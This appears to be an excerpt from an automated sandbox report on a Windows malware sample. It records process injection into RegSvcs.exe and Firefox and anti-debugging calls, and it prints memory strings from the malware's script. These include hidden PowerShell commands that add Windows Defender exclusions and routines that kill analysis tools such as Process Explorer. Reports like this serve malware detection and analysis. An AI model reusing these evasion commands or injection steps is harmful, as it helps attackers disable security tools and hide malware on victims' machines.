            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141AAEE mov eax, dword ptr fs:[00000030h]15_2_0141AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141AAEE mov eax, dword ptr fs:[00000030h]15_2_0141AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EEA80 mov eax, dword ptr fs:[00000030h]15_2_013EEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EEA80 mov eax, dword ptr fs:[00000030h]15_2_013EEA80
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E92CE0 GetProcessHeap,0_2_00E92CE0
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E86878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E86878
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E8AAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E8AAC4
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E86A0B SetUnhandledExceptionFilter,0_2_00E86A0B
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E85BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E85BBF
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D929B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00D929B2
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D80BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00D80BCF
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D80D65 SetUnhandledExceptionFilter,8_2_00D80D65
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D80FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00D80FB1

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtResumeThread: Direct from: 0x773836AC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtMapViewOfSection: Direct from: 0x77382D1C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtWriteVirtualMemory: Direct from: 0x77382E3C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtProtectVirtualMemory: Direct from: 0x77382F9C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtSetInformationThread: Direct from: 0x773763F9
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtCreateMutant: Direct from: 0x773835CC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtNotifyChangeKey: Direct from: 0x77383C2C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtSetInformationProcess: Direct from: 0x77382C5C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtCreateUserProcess: Direct from: 0x7738371C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtQueryInformationProcess: Direct from: 0x77382C26
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtResumeThread: Direct from: 0x77382FBC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtWriteVirtualMemory: Direct from: 0x7738490C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtAllocateVirtualMemory: Direct from: 0x77383C9C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtReadFile: Direct from: 0x77382ADC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtAllocateVirtualMemory: Direct from: 0x77382BFC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtDelayExecution: Direct from: 0x77382DDC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtQuerySystemInformation: Direct from: 0x77382DFC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtOpenSection: Direct from: 0x77382E0C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtQueryVolumeInformationFile: Direct from: 0x77382F2C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtQuerySystemInformation: Direct from: 0x773848CC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtReadVirtualMemory: Direct from: 0x77382E8C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtCreateKey: Direct from: 0x77382C6C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtAllocateVirtualMemory: Direct from: 0x773848EC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtQueryAttributesFile: Direct from: 0x77382E6C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtSetInformationThread: Direct from: 0x77382B4C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtTerminateThread: Direct from: 0x77382FCC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtQueryInformationToken: Direct from: 0x77382CAC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtOpenKeyEx: Direct from: 0x77382B9C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtAllocateVirtualMemory: Direct from: 0x77382BEC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtDeviceIoControlFile: Direct from: 0x77382AEC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtCreateFile: Direct from: 0x77382FEC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtOpenFile: Direct from: 0x77382DCC
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe | NtProtectVirtualMemory: Direct from: 0x77377B2E
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\SysWOW64\EhStorAuthn.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: NULL target: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe protection: read write
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: NULL target: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Thread register set: target process: 3744
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Thread APC queued: target process: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4B8008
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CB6000
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DC1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00D63312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: for $objantivirusproduct in $colitems
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $usb = $objantivirusproduct.displayname
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: next
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: return $usb
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: endfunc ;==>antivirus
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: func disabler()
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;if antivirus() = "windows defender" then
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;#requireadmin
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;endifmemstr_0e8ff7c8-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>disablermemstr_e89a32d9-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func antianalysis()memstr_6fc50f9b-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") thenmemstr_49c1cbfd-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process explorer")memstr_71345c1c-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp64.exe")memstr_322ad7d4-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp.exe")memstr_d9ea5b03-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process hacker") thenmemstr_23a7ad66-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process hacker")memstr_bd609eda-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("processhacker.exe")memstr_e49c138f-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x571zxu23j7r5801x342memstr_36bb6772-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150747760.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zu`zuccmemstr_ebfcf3f5-8
            Source: FS04dlvJrq.exe, 00000000.00000002.2313928019.00000000072AE000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 98w##memstr_08d28c0f-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zu`zuccmemstr_52d5bd8b-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tkf91tf3memstr_80b4bbb6-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q^i[_imemstr_c72a9c02-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _i|bimemstr_33afc1cc-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aiiai3_imemstr_ba660e83-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _ie`ik_iwbimemstr_43bf61c9-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ppj!jmemstr_711fdcdd-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u<@ppj!jmemstr_dc916983-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: us9q4unmemstr_413982ce-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9{dtmemstr_c2172061-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i9{dtmemstr_41f904fd-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9{htmemstr_92cf23ad-a
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i9{htmemstr_38882acf-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wj!j j memstr_a90b528f-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4)mg;memstr_7338d589-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i9|$(memstr_b8b1f37a-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$,0pwmemstr_75097939-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9|$(tmemstr_ae19b35a-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$,pwmemstr_47128091-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$,pjmemstr_6d9e128f-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$\pwhlmemstr_ac9f9673-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$ph+memstr_641c2b71-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$8+d$0jmemstr_a7c9ea80-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$<+d$4@pmemstr_c859fb38-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$<+d$4pmemstr_1727bac8-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |$ t"jmemstr_e29fb38e-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qqsvwmemstr_3923f653-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pppppmemstr_76a8004b-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ pjmemstr_0bf1c885-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ pjh3memstr_355cfa8c-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ pjh2memstr_b5ea203e-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )mwqwmemstr_8294fc83-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 54)mh )mvmemstr_46148e97-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivyi}yimemstr_affd182e-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #msvwtmemstr_2999037a-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$0vpsmemstr_07f1b5e3-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$8psmemstr_a9a9b346-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$4psmemstr_5c5c0c8b-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9t$$tmemstr_fdf0d576-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$4pjmemstr_f25194be-a
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |$$t@memstr_7fba0d0d-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$0psmemstr_7844dea9-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t)m;ememstr_7eec7e1e-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x)m;ememstr_015c3bfc-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *;5p)mmemstr_582aa2fa-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5p)m3memstr_408085c2-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^954)mmemstr_0a64fe3f-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f;54)mmemstr_d598392c-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )mjjj memstr_3985b7d2-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gvpppppmemstr_5a6ca50a-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svjdjmemstr_07d52493-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d@mvsfmemstr_4e8aae24-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ppj pppmemstr_f7f065ac-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 954)mmemstr_493baf84-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 954)m|~memstr_126b28aa-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i_^[]memstr_a45d0ab9-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $svw3memstr_c6e14ffa-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =l)mtmemstr_3c90db6c-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tysvjmemstr_76b83b73-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =l)m^[tmemstr_ea92eb45-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ pwmemstr_b18bb356-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$$pwmemstr_af8b98af-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $)mj,memstr_a2f81325-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ x&memstr_ee896fff-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$(pjmemstr_34ed78fc-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$l;t$memstr_d5025c02-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$hpvmemstr_eb56f398-d
